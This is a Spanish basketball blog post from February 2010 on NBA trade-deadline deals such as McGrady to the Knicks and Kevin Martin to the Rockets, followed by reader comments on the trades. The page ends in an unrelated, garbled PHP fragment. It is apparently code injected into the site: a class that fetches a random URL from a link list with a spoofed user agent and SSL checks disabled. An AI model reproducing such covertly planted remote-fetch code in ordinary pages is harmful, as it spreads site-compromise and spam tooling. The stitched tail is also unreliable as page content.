Fin de fiesta: McGrady a los Knicks y Kevin Martin a los Rockets

18 de February de 2010 por txusma

Ya ha finalizado el plazo para cerrar traspasos en la NBA y la principal noticia es, sin duda, ese traspaso a 3 que ha involucrado a Kings, Knicks y Rockets y que ha terminado con T-Mac (y principalmente sus 22 millones de expiring, no lo olvidemos) en la franquicia de la Gran Manzana. Rockets y Kings habían llegado a un principio de acuerdo pero ante la insistencia del agente de Tracy McGrady finalmente los Knicks también se han visto involucrados. A los aficionados españoles probablemente también nos interesará mucho que Sergio Rodríguez acompaña al ex de los Magic y que se enfrentará, posiblemente, a su última oportunidad de demostrar que tiene sitio en la NBA. Los Rockets se hacen finalmente con Kevin Martin, Jordan Hill, Jared Jeffries y rondas de los Knicks y los Kings con Carl Landry (uno de los mejores contratos de la competición en estos momentos exceptuando los de los rookies), Joey Dorsey y Larry Hughes, otro jugoso expiring. Con este movimiento los Knicks consiguen el espacio necesario para fichar a 2 grandes agentes libres el próximo verano. Ya veremos si finalmente lo consiguen.

Otros movimientos que se han cerrado en las últimas horas:

– Los Bobcats apuntalan el equipo con el fichaje de Tyrus Thomas, a cambio de Acie Law, Flip Murray y una futura primera ronda, y de Theo Ratliff que proviene de los Spurs.
– Sobre la bocina, los Memphis Grizzlies se han hecho con los servicios de Ronnie Brewer (Utah Jazz) a cambio de una futura primera ronda. Ayer mismo Zach Randolph demandaba traspasos que mejoraran el banquillo y unas horas después los directivos de los ositos ya le han hecho caso.
John Salmons jugará lo que resta de temporada en los Bucks a cambio de Hakim Warrick y Joe Alexander. Además los Bulls dan también un par de segundas rondas y la posibilidad de intercambiar las primeras rondas de 2010 si la de los Bulls no está entre las 10 primeras.
– Los Kings se hacen con Dominic McGuire (Washington Wizards) y dinero fresco a cambio de una futura segunda ronda. Parece una tontería pero con este movimientos los Wizards se ponen por debajo del límite y ya no se ven obligados a negociar el Buy Out de Ilgauskas. De todas maneras, parece claro que el lituano no aguantará mucho en Washington.
– Concretando: Nate Robinson y Marcus Landry a los Celtics a cambio de Eddie House, JR Giddens y Bill Walker.
– Se nos había pasado un trade más: Philadelphia adquiere a Jodie Meeks y Francisco Elson de los Bucks a cambio de Primoz Brezec, Royal Ivey y una segunda ronda.

Comenta

11 comentarios a esta entrada

  1. rojorob dice:
    #1

    Leía yo el otro día no sé dónde (si fue aquí perdón por la repetición) que los Knicks están hipotecando todo al verano de 2010, pero ¿y si LeBron se queda en Cleveland y Wade en Miami? Porque a lo mejor Joe Johnson mola, pero no creo que sea lo que están esperando desde hace tres años.

      Citar

  2. Pirrimarzon dice:
    #2

    Como seguidor de los Kings me siento defraudado y humillado. Por un titular como Martin no hemos podido sacar nada más que a Landry, suplente, y una colección de medianías que no tienen ni hueco en el roster. Patético.

    Saludos

      Citar

  3. Rafa dice:
    #3

    Mucho peso tendrá el resultado en postemporada… en NY ya han comenzado las oraciones para que Cavs no ganen el anillo.

    Veo más fácil lo de Wade, pero no descartemos nada, hay muchos intereses (más allá de los deportivos) para que el equipo de la gran manzana vuelva a estar arriba con James y/o Wade.

      Citar

  4. Txusma dice:
    #4

    Pirrimarzon yo no lo veo así ni mucho menos así. En estos momentos Landry le pega 3 vueltas a Donte Greene y Jason Thompson y viene para ser titular en los Kings. Incluso Hawes puede ver como su tiempo de juego se reduce aún más. A mi me parece una gran adquisición con ese gran contrato que tiene (el año q viene solo cobrará 3 millones). Y además han conseguido por los meno, 10 millones más de hueco para el verano del año siguiente. A mi me encanta el traspaso para los 3 equipos que han conseguido todos los que querían.

    Y sintiendo romper el optimismo generado con la llegada de Sergio a NY, más vale que se espabile el canario esta misma temporada pq no tiene el contrato garantizado para la siguiente y NY, a poco que duden, se lo qitan de encima para conseguir más y más hueco salarial.

      Citar

  5. Dantley2 dice:
    #5

    Pirrimarzón, aquí un cuasi-King, ¿podrían haber obtenido más de algún otro equipo? Tengo muchas dudas, Kevin Martin es muy bueno, pero ni es hombre franquicia, ni tiene un historial limpio de lesiones, ni tiene un salario asequible. Unes las tres cosas y te sale que su valor de mercado no es tanto como su calidad. la conclusión de que Tyreke y Martin no iban a funcionar juntos creo que estaba en la cabeza de todos, así que lo mejor era cortar y empezar de nuevo.

    Landry es un enorme jugador, no estoy del todo de acuerdo con Txus en que es muy superior a Greene que me parece que tiene un potencial alucinante, ni a Jason Thompson que aporta otras cosas sobre Landry que de cuerpo llega muy justito a jugar de 4, pero Landry ofensivamente aporta muchísimo, ya lo verás. Muy buena cabeza, muy buen tirito y muy de equipo. Creo que le vendrá muy bien a los Kings.

    El resto es morralla aunque me gustaría esperar a ver qué tal lo hace Dorsey que si Blair tiene hueco, Dorsey puede tenerlo porque es una máquina de rebotear, eso sí, ya es ceder demasiado en centímetros.

    Mira el trade como Martin x Landry + agente libre de 10 millones

      Citar

  6. portu dice:
    #6

    Jose, Landry ha acabado en Boston. Sacramento aún sin Landry no ha hecho mal las cosas, Martin es un jugador algo sobrevalorado, pero sobretodo sobrepagado… ahora tienen el espacio para otra apuesta y sobretodo tras la llegada de Tyreke, para apostar por alguien de otra posición el próximo verano y compensar el equipo.

      Citar

  7. portu dice:
    #7

    Buf, olvídate, je,je, estaba pensando en Carl Landry, jo,jo, me las prometía muy felices para Boston…

      Citar

  8. max dice:
    #8

    Portu, no confundas a Marcus Landry, que efectivamente ha acabado en Boston desde NY, con Carl Landry, que ha ido de Houston a Sacramento y aún está allí. XD

      Citar

  9. aro_pasado_no_newtoniano dice:
    #9

    Juas,,,mcgrady con el #3 de marbury.

      Citar

  10. aro_pasado_no_newtoniano dice:
    #10

    se la van a pasar bien en el Madison con ‘Rodrigues’

      Citar

  11. Love Denise dice:
    #11

    Hace unos días, leí una noticia sobre que a McGrady no le importaría la próxima temporada, volver a jugar en Orlando por un milloncete de dólares, equipo con el que jugó sus mejores años, en el que está su primo Carter y que tiene un muy buen proyecto deportivo en los próximos años cimentado en Howard. Ya sé que queda mucho para el verano y que sólo es una noticia, pero pensais que cuajaría la vuelta de T-Mac a los Magic, o sería muchos gallos en el gallinero?. Personalmente, me gustaría ver un Nelson-T-Mac-carter-lewis-howard. Además si se lesiona o se arrastra, cobraría el mínimo. De momento en su debut ha hecho un partidazo con 26 puntos y 10/17 en el tiro. Y el chacho ha defraudado un poco en su debut. 5ptos, 6asist en 25min.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>